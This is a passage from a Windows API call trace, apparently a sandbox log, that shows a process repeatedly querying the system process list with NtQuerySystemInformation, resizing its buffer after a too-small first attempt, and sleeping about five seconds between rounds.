RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.602] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.604] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.604] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.609] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.615] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.624] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.627] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.631] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.632] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.636] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.640] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.641] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.643] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.651] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.653] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.654] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.654] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.661] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.668] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.674] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.675] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.677] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.677] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.681] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.682] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.689] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.690] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.691] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.692] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.698] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.704] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.706] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.711] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.718] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.720] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.725] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.728] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.728] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.732] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.733] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.734] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.739] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.740] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.742] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.743] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.747] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.748] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.749] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) 